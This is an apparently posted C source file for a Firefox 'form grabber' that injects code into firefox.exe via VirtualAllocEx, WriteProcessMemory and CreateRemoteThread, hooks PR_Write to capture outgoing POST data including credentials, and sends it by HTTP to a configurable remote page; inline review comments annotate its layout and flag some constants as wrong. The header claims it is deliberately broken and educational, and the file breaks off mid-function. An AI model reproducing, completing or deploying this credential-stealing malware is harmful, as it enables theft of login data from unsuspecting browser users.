  1. /*Ok, so firstly I created this purely for educational reasons. To prevent any Feds attempting to have an early morning party v& dance, this code will not work as posted. (You could make it work by changing 4 lines.)
  2.  
  3. If you get this working, use it maliciously and get arrested, don't come crying to me.
  4.  
  5. Now that's out of the way, here is the form grabber. Blackhats commonly use programs similar to this to "grab" form data (including credentials) from websites you visit, before it leaves the browser. It's a simple C/C++ program that can run from admin or lower-rights accounts.
  6.  
  7.  
  8. Remember this script is BROKEN. Firefox "patched" this method.*/
  9.  
  10. #include <stdio.h>
  11. #include <windows.h>
  12. #include <string.h>
  13. #include <Tlhelp32.h>
  14. #include <wininet.h>
  15. #include <tchar.h>
  16. #define HTTP_PORT 80 // plain HTTP: the captured form data is itself exfiltrated in cleartext
      /* Exfiltration target for captured POST bodies. "localhost" is the deliberately
         non-functional placeholder the header comment refers to. Both strings are copied
         with strcpy into 16-byte fields of InjectData, so they must stay under 16 bytes. */
  17. #define HTTP_POST "POST"
  18. #define HTTP_POST_HEADER "Content-Type:application/x-www-form-urlencoded"
  19. #define HTTP_REMOTE_SITE "localhost"
  20. #define HTTP_REMOTE_PAGE "/postDemo.php"
      /* Target process and the hooked export. PR_Write is looked up in nspr4.dll; the hook
         compares the first four bytes of the written buffer against "POST" (HOOK_POST_CMP),
         which only makes sense if the data is still plaintext HTTP at that layer.
         NOTE(review): the header says Firefox "patched" this -- presumably NSPR is no longer
         shipped as a separate nspr4.dll, so the GetModuleHandle lookup fails; unverified here. */
  21. #define FIREFOX_PROCESS TEXT("firefox.exe")
  22. #define FIREFOX_PR_WRITE "PR_Write"
  23. #define NSPR4_DLL "nspr4.dll"
  24. #define WININET_DLL "wininet.dll"
  25. #define KERNEL32_DLL "kernel32.dll"
      /* Number of bytes copied out of Hook() into the target (see the WriteProcessMemory
         call in main). This is a blind size, not the function's compiled length: if Hook()
         is smaller the copy reads past its end, if larger the tail is silently truncated. */
  26. #define HOOK_CODE_SIZE 2000
      /* Stack offsets relative to ESP/EBP used by the hook trampoline (the Hook() body is
         not part of this excerpt); these describe a 32-bit frame layout only. */
  27. #define HOOK_ESP_DATA_OFFSET 0x08
  28. #define HOOK_ESP_DATA_SIZE 0x0C
  29. #define HOOK_ESP_ARG_0 0x04
  30. #define HOOK_POST_CMP 0x54534F50 // little-endian DWORD of the bytes 'P','O','S','T' (reads as "TSOP" in a hex dump)
  31. #define HOOK_JMP 0xE9 // JMP rel32: one opcode byte + 4-byte signed displacement relative to the next instruction
  32. #define HOOK_INT3 0xCC // breakpoint; presumably fills the 6th patched byte after the 5-byte jmp (see PR_WRITE_JMP_VP_SIZE)
  33. #define HOOK_JMP_INST_SIZE 0x01
  34. #define HOOK_INT3_SIZE 0x01
  35. #define HOOK_ADDRESS_SIZE_32 0x04
  36. #define HOOK_ADDRESS_SIZE_64 0x08
  37. #define HOOK_REL_JMP_OFFSET_32 (HOOK_JMP_INST_SIZE + HOOK_ADDRESS_SIZE_32) // 5
      /* NOTE(review): there is no 9-byte E9 form on x86-64 -- E9 always takes a rel32 -- so
         this constant does not describe a real instruction. A 64-bit detour needs a different
         sequence (e.g. mov rax, imm64 / jmp rax or push/ret). Treat all _64 values as untested. */
  38. #define HOOK_REL_JMP_OFFSET_64 (HOOK_JMP_INST_SIZE + HOOK_ADDRESS_SIZE_64) // 9
  39. #define HOOK_PARAM1_OFFSET_32 0x08 // presumably [ebp+8]: first argument in a conventional 32-bit frame
  40. #define HOOK_LOCALVAR1_OFFSET_32 0x04 // Should be [ebp-4]: first local -- depends on the compiler's frame layout, not guaranteed
  41. #define PR_WRITE_JMP_VP_SIZE 0x06 // bytes of PR_Write made writable for the patch: 5-byte jmp + 1 int3 (0x0A for 64 bits)
  42. typedef HMODULE (WINAPI *FnGetModuleHandle) (LPCTSTR);
      /* Function-pointer types for the APIs the injected code calls. The addresses are
         resolved in the injector (main) and copied into the target as raw values, which
         only works if kernel32.dll and wininet.dll are mapped at the same base address in
         both processes.
         NOTE(review): the wininet signatures below take LPCTSTR, but main() resolves the
         "...A" exports and InjectData stores char arrays. Built with UNICODE defined these
         prototypes no longer match the functions actually called; LPCSTR would be accurate. */
  43. typedef FARPROC (WINAPI *FnGetProcAddress) (HMODULE,LPCSTR);
  44. typedef int (WINAPI *FnVirtualProtect) (LPVOID,SIZE_T,DWORD,PDWORD); // returns BOOL (int); used to make PR_Write's prologue writable
  45. typedef HINTERNET (WINAPI *FnInternetOpen) (LPCTSTR,DWORD,LPCTSTR,LPCTSTR,DWORD);
  46. typedef HINTERNET (WINAPI *FnInternetConnect)(HINTERNET,LPCTSTR,INTERNET_PORT,LPCTSTR,LPCTSTR,DWORD,DWORD,DWORD_PTR);
  47. typedef HINTERNET (WINAPI *FnHttpOpenRequest) (HINTERNET,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR*,DWORD,DWORD_PTR);
  48. typedef BOOL (WINAPI *FnHttpSendRequest)(HINTERNET,LPCTSTR,DWORD,LPVOID,DWORD);
  49. typedef VOID (WINAPI *FnSleep)(DWORD);
  50. typedef struct {
      /* Everything the injected Hook() needs, pre-resolved by main() and copied byte-for-byte
         into the target with WriteProcessMemory. Because the raw bytes cross the process
         boundary, field order and pointer width must be identical on both sides -- the
         injector's pointer size (data.addressSize = sizeof(BYTE *)) decides the layout, so a
         32-bit injector cannot hand this struct to a 64-bit Firefox. Do not reorder fields.
         Fields marked "scratch" are not initialized by main(); presumably Hook() fills them. */
  51. FnGetModuleHandle fnGetModuleHandle; // GetModuleHandle
  52. FnGetProcAddress fnGetProcAddress; // GetProcAddress
  53. FnVirtualProtect fnVirtualProtect; // VirtualProtect
  54. FnSleep fnSleep; // Sleep
  55. char nameNspr4[36]; // "nspr4.dll" (NSPR4_DLL, strcpy'd in main)
  56. char namePR_Write[36]; // "PR_Write" (FIREFOX_PR_WRITE)
  57. BYTE *PR_Write; // scratch: resolved address of the hooked export
  58. BYTE *nptr; // scratch
  59. DWORD *bptr; // scratch
  60. DWORD oldProtectValue; // scratch: previous protection returned by VirtualProtect
  61. char blank[3]; // "" -- presumably passed where an empty/optional string argument is needed
  62. char remoteSite[16]; // "localhost" (HTTP_REMOTE_SITE); strcpy target, so the macro must stay < 16 bytes
  63. char post[10]; // "POST" (HTTP_POST)
  64. char pageName[16]; // "/postDemo.php" (HTTP_REMOTE_PAGE); strcpy target, must stay < 16 bytes
  65. char header[64]; // "Content-Type:application/x-www-form-urlencoded" (HTTP_POST_HEADER, 46 chars)
  66. HINTERNET fnOpenHandle; // scratch: InternetOpen handle
  67. HINTERNET fnConnectHandle; // scratch: InternetConnect handle
  68. HINTERNET internetHandle; // scratch: HttpOpenRequest handle
  69. int postDataLength; // scratch
  70. char *pPostData; // scratch: captured request body to exfiltrate
  71. FnInternetOpen fnInternetOpen; // resolved as InternetOpenA in main
  72. FnInternetConnect fnInternetConnect; // InternetConnectA
  73. FnHttpOpenRequest fnHttpOpenRequest; // HttpOpenRequestA
  74. FnHttpSendRequest fnHttpSendRequest; // HttpSendRequestA
  75. int addressSize; // 4, or 8 on 64 bit CPUs -- the injector's sizeof(BYTE *), not the target's
  76. } InjectData;
  77. void Hook(InjectData *pData);
  78. int main() {
  79. InjectData data;
  80. LPVOID pRemoteProgram, pRemoteMemory;
  81. HANDLE rThread;
  82. HMODULE kernel32;
  83. HMODULE wininet;
  84. HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  85. PROCESSENTRY32 ProcessInfo;
  86. ProcessInfo.dwSize = sizeof(PROCESSENTRY32);
  87. LoadLibraryA( WININET_DLL );
  88. wininet = GetModuleHandleA( WININET_DLL );
  89. kernel32 = GetModuleHandleA( KERNEL32_DLL );
  90. data.fnGetModuleHandle = (FnGetModuleHandle) GetProcAddress( kernel32,"GetModuleHandleA" );
  91. data.fnGetProcAddress = (FnGetProcAddress) GetProcAddress( kernel32, "GetProcAddress" );
  92. data.fnVirtualProtect = (FnVirtualProtect) GetProcAddress( kernel32, "VirtualProtect" );
  93. data.fnSleep = (FnSleep) GetProcAddress( kernel32, "Sleep" );
  94. data.fnInternetOpen = (FnInternetOpen) GetProcAddress( wininet, "InternetOpenA" );
  95. data.fnInternetConnect = (FnInternetConnect) GetProcAddress( wininet, "InternetConnectA" );
  96. data.fnHttpOpenRequest = (FnHttpOpenRequest) GetProcAddress( wininet, "HttpOpenRequestA" );
  97. data.fnHttpSendRequest = (FnHttpSendRequest) GetProcAddress( wininet, "HttpSendRequestA" );
  98. strcpy( data.nameNspr4, NSPR4_DLL );
  99. strcpy( data.namePR_Write, FIREFOX_PR_WRITE );
  100. strcpy( data.remoteSite, HTTP_REMOTE_SITE );
  101. strcpy( data.post, HTTP_POST );
  102. strcpy( data.pageName, HTTP_REMOTE_PAGE);
  103. strcpy( data.header, HTTP_POST_HEADER );
  104. strcpy( data.blank, "");
  105. data.addressSize = sizeof( BYTE * ); // size of a pointer
  106. while(Process32Next(handle, &ProcessInfo))
  107. {
  108. // strcmp on ANSI, wcscmp on UNICODE
  109. if(! _tcscmp(ProcessInfo.szExeFile, FIREFOX_PROCESS))
  110. {
  111. HANDLE firefoxHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, ProcessInfo.th32ProcessID);
  112. pRemoteMemory = VirtualAllocEx( firefoxHandle, NULL, sizeof(data), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
  113. WriteProcessMemory(firefoxHandle, pRemoteMemory, &data, sizeof(data), NULL);
  114. pRemoteProgram = VirtualAllocEx( firefoxHandle, NULL, HOOK_CODE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
  115. WriteProcessMemory(firefoxHandle, pRemoteProgram, Hook, HOOK_CODE_SIZE, NULL);
  116. rThread = CreateRemoteThread( firefoxHandle, NULL, 0, (LPTHREAD_START_ROUTINE) pRemoteProgram, pRemoteMemory, 0 ,NULL);
  117. WaitForSingleObject( rThread, INFINITE);
  118. CloseHandle(firefoxHandle);
  119. }